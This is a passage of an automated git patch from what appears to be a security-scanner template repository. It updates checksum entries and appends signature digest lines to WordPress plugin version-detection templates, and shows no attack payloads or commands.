-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:de3b98dd0dad8fb337d7d87d4ca0cb1dd0c06217 -http/technologies/wordpress/plugins/woocommerce-services.yaml:8f036e28eb492737c2af79a29bc9edd7fc871c3e -http/technologies/wordpress/plugins/woocommerce.yaml:b14c4122222f9677de082a64952ee13e03cef5d8 -http/technologies/wordpress/plugins/wordfence.yaml:a3fc4bc2ca89def6428d441c0c87b03db61593ba -http/technologies/wordpress/plugins/wordpress-importer.yaml:f012e99684d68788f3e2c661be71d8fe5c12e6a2 -http/technologies/wordpress/plugins/wordpress-seo.yaml:eb780caf184258badd4aba2abe83eba587533b2e +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:606e6149586671be5b83ae94450fb79fce1f14c4 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:bb9112bd075d0257a88f98e99d0fa9a84ef78f62 -http/technologies/wordpress/plugins/wp-file-manager.yaml:034d843ba3aded901d3461479e521341e5baed4e -http/technologies/wordpress/plugins/wp-google-maps.yaml:379266a0012c1771a44ba97cab6484537b375a2f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4d5fd18907042edb83549b964d841210bd5fd9a9 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:dcff13bdd9e85912f41d24a8b568baa18c39b176 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:9b2d5bec63a4cce32c65e10ad9236d5621c18d14 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:8aebd12bb29036b60e2ff4d3460f5b92fcd3bcfc -http/technologies/wordpress/plugins/wp-optimize.yaml:2b30e82e4a90b873cb94858ae519276ab01abcd7 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:93271793d503a755208424539759574bc62a0ce8 -http/technologies/wordpress/plugins/wp-reset.yaml:b128d381606a7efc2cb107e244ae41e5e05f1c10 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0e6140e72b70222286bd62e267fb4ba1b52fc9a2 -http/technologies/wordpress/plugins/wp-rollback.yaml:c46758aecf6abaf1bc1d8cafdc58e245982c5c5d -http/technologies/wordpress/plugins/wp-seopress.yaml:4e2e3cfee843ed80e76828ab3b5679a06c96b61d -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4df36e1e3f17499f0f1765d3a453c379500dac8e -http/technologies/wordpress/plugins/wp-smushit.yaml:2d1d4390069dfc6b5da70cd49c2b37d77a3863bb -http/technologies/wordpress/plugins/wp-statistics.yaml:23f3ee6b0e545d3a37ef5975ae8a2f8f24ddbd54 -http/technologies/wordpress/plugins/wp-super-cache.yaml:40e2abbd95f38f9e1622d0b80f935aadc88381ad +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:0b023d2de5767c73c590eb8505f54c789d3cb4b5 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:5958bfe42f37c632446be0f748e043117dce6360 -http/technologies/wordpress/plugins/wpforms-lite.yaml:aca4cf2be75e83728abc42f9d35a9eef67330af0 -http/technologies/wordpress/plugins/wps-hide-login.yaml:1590ed61432f9e1d296e6402a22d8b505eb070a3 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:ccbe1d0a5910d15fa52ec05aafc1cc6845a72d27 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:120382b84abe554580ac482834a67b0da3659abd +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -7843,7 +7843,7 @@ http/vulnerabilities/generic/generic-windows-lfi.yaml:ddcb321d2bb5e3e9bee57a6593 http/vulnerabilities/generic/host-header-injection.yaml:827f0694d3294d945da80d2dd7aa2ed3e820fc68 http/vulnerabilities/generic/oob-header-based-interaction.yaml:2cac39750dee5c610c6c1023a6fa0c73199e66ec http/vulnerabilities/generic/oob-param-based-interaction.yaml:635728a0bd7fbecc745a2be8d7a51b02ed0ee57b -http/vulnerabilities/generic/open-redirect-generic.yaml:d846ac7b28a783ecb5a42d54cf3e5c9c9112a15f +http/vulnerabilities/generic/open-redirect-generic.yaml:2e22c02de6e4dfb30dd01c6fd4f95f92cb55b9c3 http/vulnerabilities/generic/request-based-interaction.yaml:d3d7eaea6c38c5463861075a7542ed9c7e8f119e http/vulnerabilities/generic/top-xss-params.yaml:3e9a7e3fa96022f53af19ddd617225731c3bd9df http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:0a058b056b1584bc9de28df14baa9b57be220e88 @@ -8873,7 +8873,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5431ff537bff1b557b051e06024749caef57386f +templates-checksum.txt:e6d1bc6380df4f00e3f5119f0dbb97a128685d39 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 275a84b0fa218e2175a7efa659d53f3304c1b5e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jul 2024 08:16:27 +0000 Subject: [PATCH 131/247] Auto Template Signing [Sun Jul 14 08:16:27 UTC 2024] :robot: --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + http/vulnerabilities/generic/open-redirect-generic.yaml | 2 +- 202 files changed, 202 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 50d350f14df..cfe0d180a6e 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -181,4 +181,4 @@ http: - 301 - 302 - 307 -# digest: 490a004630440220798dab0882b46e287f296c1f1ba1f9b47422c2b080486183184727f3de119087022044b26046d5aba5529bb7583ccebd65748198fff98a625c16b07432abf5a4fe8c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d5d09d72be494c1eb95fd874c9d31cee1ac9e14d7d578419fa0a8298c9f8ca9002202e00bd1843e97bb9160eb898cea0a3301321571d4d65ea7c4bce6b90f9dc82fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749a..066e4001bcf 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a0cb2289816c51f7d36609c737196ba9a1de7ca813f2e1c9361b6c34bf4de9f022100ddf473616f26f1f04152d8036ebbf20764f2e91b969c6b3e1f54409dc1abebb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b632..90dc7553651 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009528fd2c65974432e6f8ff3697d8719250ac544be7e171cf685615b506b9b69d0221009b9d0ff3a696228306574998d4a26ff3c5368cff1d838c45555adf6f75e10d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc80..504e97ec62f 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220057ea8832bdc60d651f2654347529120ffd352f18002fcabb2756795fc12eee20220200fade18948114ad83c81847a1057882b4b58f25ac2491bf2588bad2125fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2ed..721e9eb64ec 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001982ddbab3738ad1af4fd6d3e56375d33cb8e0a20eecba41d6ecc58e9f34999022100fa06ddd8f8181b3d733d09c42483fe69582171845ede52f76443e14e6964e1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f556..b277969d45f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2695462fb853c9b01b1fa9c062bc1121bd7d95154f44d8537574f36b96e0b87022100fc9614d4d9b67ae0285cf7b3bb1ae0d90a693221e74c1777c561a2613e5760f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d042..765cb1bf1c7 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6a12b9f233708e392ad44588610edc52d0827438ca0e213e34dc1fd5ddca4f702210082d613b28f2a1db85b1e68df6c70c6163d58e3c992655ad6e3e33ae91e2e0444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f4469..bd455711b44 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008874122a4bf0f3c5953fd919733113711ee88e4aa73b2922206e2168a99ca005022100d778ab6bbb0d85b2cb9a8f63be94fb04bfa5c68aa2a857d1e645f7c7c630ca9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e6..e33bd20e132 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220239d566a18761cd95a4238081fe8aa9428ee67b734e8e6a5674432b1c0b4f162022100cb59f217b5dd088af2b2398ca68838c9c4a7fd9d8dc7163502a478b1a82ff70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e9..321a6701280 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210086b860ddcc5181903f1c83a2e9c28bcba6613216e9a85d47c57dff855477be6f022001cab48543e5e972bb7d3c89c2135d6670aada07dcd939ce538a2621ecbcf583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1f..dc524611649 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100856786cfd664461b6f5cf373bd622ae4cd4f2fd25446c276801dc27d13dac1be022100e4559f028ce3ea893fedc8a1c6f909e323d3dfa2032da8a207300ef4e0b391b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd5..718e001cdc9 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 